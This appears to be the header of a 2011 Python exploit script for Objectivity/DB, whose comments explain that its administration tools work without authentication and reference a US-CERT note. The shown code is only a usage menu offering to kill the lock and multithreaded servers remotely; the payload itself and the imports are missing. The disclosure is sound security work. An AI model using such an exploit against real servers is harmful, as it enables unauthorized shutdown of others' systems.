Objectivity/DB Lack of Authentication Remote Exploit
#!/usr/bin/python
# obj.py
# Objectivity/DB Lack of Authentication Remote Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# Jan 2011
#
# "Objectivity, Inc. is a leader in distributed, scalable database technology.
# Our patented data management engine and persistent object store is the enabling
# technology powering some of the most complex applications and mission critical
# systems used in government, business and science organizations today."
#
# Objectivity/DB includes many different tools for administration. The
# problem is, anyone can use these tools to perform operations on the host
# running the lock server, advanced multithreaded server, and probably
# it's other servers as well, without any authentication. This design flaw
# puts the host running these servers at risk of potentially unauthorized
# operations being performed on the system, locally or remotely.
#
# This code demostrates a couple of the easiest operations to replicate
# by hand, like killing the lock and am servers. The suite contains lots
# of other admin tools that do various, more interesting tasks with the
# Objectivity/DB, such as oobackup, oonewfd, oodeletefd, oodebug, etc...
#
# Tested on Objectivity/DB 10 running on Windows
#
# Fixed version: N/A, US-CERT coordinated the communication and released
# a vulnerability note after the vendor did not provide additional feedback.
#
# http://www.kb.cert.org/vuls/id/782567
#
if len(sys.argv)<3:
print "Objectivity/DB Remote Exploit"
print "Usage: %s <target> <operation>"%sys.argv[0]
print "\nWhat would you like to do?\n"
print "[1] Kill the advanced multithreaded server"
print "[2] Kill the lock server"
print "For other operations, check out oobackup, oodebug, etc"
sys.exit(0)
